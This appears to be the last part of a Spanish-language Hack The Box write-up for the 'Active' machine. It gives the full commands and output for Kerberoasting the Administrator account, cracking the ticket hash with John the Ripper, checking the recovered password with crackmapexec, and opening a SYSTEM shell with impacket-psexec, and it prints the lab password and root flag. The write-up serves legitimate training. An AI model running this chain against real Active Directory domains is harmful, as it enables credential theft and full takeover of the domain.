active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 16:06:40.351723 2025-02-22 08:35:36.933359Vemos que si podemos y ademΓ‘s obtendremos la contraseΓ±a del administrador en forma de hash, entonces ahora vamos a pedirlo con el parametro "-request":
impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18 -requestβ― impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 16:06:40.351723 2025-02-22 08:35:36.933359
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$68fc33ed307322ba1e71555d9541e8fe$aa2ea019b718a625f8e1dfd06c80772f43148fff909eddc2e5514558d0a27afd2acf90b71a365bcc741c07a4c830770f89a978cda12be069bbb2e7b0a542f0955e418dc7845dd501f95f652d33febeaaf574e4bb9e3195cd9fe4919786348f9f49190fc9386de30ed66a7d238ba42a0148c00cfff5eee7292e4f1278ac621fa6f0311faba87eb9b797744f099b36fe35e72ff74b1a110771a1c57f4e24c0d280fae1899d1dff8e9e0d0d5c158755a188d5d2dde87d8563f77b2af7015f6baae40ef60f46b9af14f1ee8e2b8817c84b82820b9f71d9e569d8726069ff9630674f205b2dd3514984118b45e5fc1de2a5be5fb18eca46f46ac3fbbaa4621420b5d96ed958e4b2387ecffcdd0cc80511a11735d9c260b829eb95e8e06e37ef43a3af27b8fadb3804136f2e6d17b1652518a3d39464e69faf5d4b8eec531c837098be53676345a91e05b68f9918212d9b14b558dad4b753ddc15470939815d2b615b5869236681b63383d32fab279b74c4c92432e7b588f0fc3a385899137759f1f039260c2016d13558cd12d6ea5b42c85cc5320207cda7de6e54f5216bedc850268cc88afef2e911aab405b3ea9016581f5947534fbd79b26d2f5c7bc30a1dc44877c4ab3eafc770498f54f1466165024afa3e73f38e0de2c2ae5a180798c2c5c3a0afba8dfe57e52b73cc023f38e2533dd5aa5263a3f8776d6c99ac073d0d27336768145f63343ef999bde08a6d9d0a3c58a0d755b1c717fee3a637b49277f0fd23b5deba5ea64faab8213df178de2e73e63d4a117e1ef27907ec37432f73bfdc94012560c26aee216d0f48a48e63410ae292defdc43e63e55b157ad5aacc250faa9c38934db4937ba5c52adfd8eb2447faaf7157a79ee68701818078d19a2a2c28597c8df97ebf7f23797d07c3b056a6837d0cbcb4d844f7b894f1b2249c6d76082c82033107568d52dde1b7c7e6b4b1859a89ce5443d5c6bff07f1ade13a519579e8bd873441bcaa5161107a53792e0a9e4197c5480970cec70fd76202d7401b825ea5848bf7583ca306457d173f1f041cfe85977f8520a45d7e6136d0492b779b334e3d452ab363d3f7ce3bd61d4ebc6d6ecf9865ecd5f7ec28dc8a4e4a190a8f62ba036102c63f711bcaa81f2e9f77cee17b6fb1bef8386279037d79266360cdc339c1e0aa7d2d0ab53304ed7385b84d2534e9d3a9e565d26ccc066be68756a236819a22a645c05a5b1be5ce0097431d5270b656cfa6c28adcVemos que nos devolvio la contraseΓ±a del Administrador pero en forma de hash, vamos a guardarnoslo en un archivo:
β― vim password_hash_ticket
β― cat password_hash_ticket
ββββββββ¬ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β File: password_hash_ticket
ββββββββΌββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
1 β $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$68fc33ed307322ba1e71555d9541e8fe$aa2ea019b718a625f8e1dfd06c80772f43148fff909eddc2e5514558d0a27afd2acf90b71a36
β 5bcc741c07a4c830770f89a978cda12be069bbb2e7b0a542f0955e418dc7845dd501f95f652d33febeaaf574e4bb9e3195cd9fe4919786348f9f49190fc9386de30ed66a7d238ba42a0148c00cfff5eee7292e4f1278a
β c621fa6f0311faba87eb9b797744f099b36fe35e72ff74b1a110771a1c57f4e24c0d280fae1899d1dff8e9e0d0d5c158755a188d5d2dde87d8563f77b2af7015f6baae40ef60f46b9af14f1ee8e2b8817c84b82820b9f
β 71d9e569d8726069ff9630674f205b2dd3514984118b45e5fc1de2a5be5fb18eca46f46ac3fbbaa4621420b5d96ed958e4b2387ecffcdd0cc80511a11735d9c260b829eb95e8e06e37ef43a3af27b8fadb3804136f2e6
β d17b1652518a3d39464e69faf5d4b8eec531c837098be53676345a91e05b68f9918212d9b14b558dad4b753ddc15470939815d2b615b5869236681b63383d32fab279b74c4c92432e7b588f0fc3a385899137759f1f03
β 9260c2016d13558cd12d6ea5b42c85cc5320207cda7de6e54f5216bedc850268cc88afef2e911aab405b3ea9016581f5947534fbd79b26d2f5c7bc30a1dc44877c4ab3eafc770498f54f1466165024afa3e73f38e0de2
β c2ae5a180798c2c5c3a0afba8dfe57e52b73cc023f38e2533dd5aa5263a3f8776d6c99ac073d0d27336768145f63343ef999bde08a6d9d0a3c58a0d755b1c717fee3a637b49277f0fd23b5deba5ea64faab8213df178d
β e2e73e63d4a117e1ef27907ec37432f73bfdc94012560c26aee216d0f48a48e63410ae292defdc43e63e55b157ad5aacc250faa9c38934db4937ba5c52adfd8eb2447faaf7157a79ee68701818078d19a2a2c28597c8d
β f97ebf7f23797d07c3b056a6837d0cbcb4d844f7b894f1b2249c6d76082c82033107568d52dde1b7c7e6b4b1859a89ce5443d5c6bff07f1ade13a519579e8bd873441bcaa5161107a53792e0a9e4197c5480970cec70f
β d76202d7401b825ea5848bf7583ca306457d173f1f041cfe85977f8520a45d7e6136d0492b779b334e3d452ab363d3f7ce3bd61d4ebc6d6ecf9865ecd5f7ec28dc8a4e4a190a8f62ba036102c63f711bcaa81f2e9f77c
β ee17b6fb1bef8386279037d79266360cdc339c1e0aa7d2d0ab53304ed7385b84d2534e9d3a9e565d26ccc066be68756a236819a22a645c05a5b1be5ce0097431d5270b656cfa6c28adc
ββββββββ΄ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββAntes de realizar fuerza bruta, vamos a utilizar un diccionario en especial, clasico de clasicos, vamos a utilizar rockyou, para eso vamos a bajarnoslo desde el siguiente enlace:
Y ahora vamos a aplicar fuerza bruta con John The Ripper sobre este ticket hasheado con el siguiente comando:
john --wordlist=rockyou.txt {HASH TICKET}En mi caso seria de la siguiente manera el comando:
john --wordlist=rockyou.txt password_hash_ticketEjecutamos:
β― john --wordlist=wordlist/rockyou.txt password_hash_ticket
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 4.79% (ETA: 23:49:29) 0g/s 789504p/s 789504c/s 789504C/s skyline93..skator
Ticketmaster1968 (?)
1g 0:00:00:13 DONE (2025-02-23 23:49) 0.07429g/s 782873p/s 782873c/s 782873C/s Tiffani143..TiagoTorrao
Use the "--show" option to display all of the cracked passwords reliably
Session completed. Vemos que nos arrojo una contraseΓ±a, de tal manera que la contraseΓ±a del usuario Administrator es "Ticketmaster1968"
User: Administrator
Password: Ticketmaster1968Vamos a verificar que las credenciales sean validas con crackmapexec:
crackmapexec smb 10.10.10.100 -u 'Administrator' -p 'Ticketmaster1968'β― crackmapexec smb 10.10.10.100 -u 'Administrator' -p 'Ticketmaster1968'
SMB 10.10.10.100 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\Administrator:Ticketmaster1968 (Pwn3d!)Ahora vamos a listar los permisos que tendremos dentro de los recursos compartidos:
crackmapexec smb 10.10.10.100 -u 'Administrator' -p 'Ticketmaster1968' --sharesβ― crackmapexec smb 10.10.10.100 -u 'Administrator' -p 'Ticketmaster1968' --shares
SMB 10.10.10.100 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\Administrator:Ticketmaster1968 (Pwn3d!)
SMB 10.10.10.100 445 DC [+] Enumerated shares
SMB 10.10.10.100 445 DC Share Permissions Remark
SMB 10.10.10.100 445 DC ----- ----------- ------
SMB 10.10.10.100 445 DC ADMIN$ READ,WRITE Remote Admin
SMB 10.10.10.100 445 DC C$ READ,WRITE Default share
SMB 10.10.10.100 445 DC IPC$ Remote IPC
SMB 10.10.10.100 445 DC NETLOGON READ,WRITE Logon server share
SMB 10.10.10.100 445 DC Replication READ
SMB 10.10.10.100 445 DC SYSVOL READ Logon server share
SMB 10.10.10.100 445 DC Users READ 3.2 Reverse shell con las credenciales Administrator
3.2 Reverse shell con las credenciales AdministratorUna vez las credenciales obtenidas del usuario administrator, vamos a conseguir una reverse shell con permisos NT AUTHORITY\SYSTEM, para eso, vamos a utilizar la herramienta "impacket-psexec" pasandole como parametro las credenciales y ciertos parametros
El comando a utilizar es el siguiente:
impacket-psexec active.htb/Administrator:Ticketmaster1968@10.10.10.100 cmd.exeEjecutamos:
β― impacket-psexec active.htb/Administrator:Ticketmaster1968@10.10.10.100 cmd.exe
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file bvkxOfwz.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service VzVS on 10.10.10.100.....
[*] Starting service VzVS.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> 3.3 ObtenciΓ³n de la flag root
3.3 ObtenciΓ³n de la flag rootLa flag de root se encuentra dentro de la ruta "C:\Users\Administrator\Desktop\root.txt", vamos a visualizarla con el comando "type"
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> type "C:\Users\Administrator\Desktop\root.txt"
bf19773bbc7b09bb12880d27b0aafaa3
C:\Windows\system32> Con esto, concluimos la maquina "Active" de Hack The Box
Espero te haya sido de ayuda este Write Up :)
Si tuviste alguna dificultad a la hora de resolverlo, no olvides contactarme en mis redes sociales
Γltima actualizaciΓ³n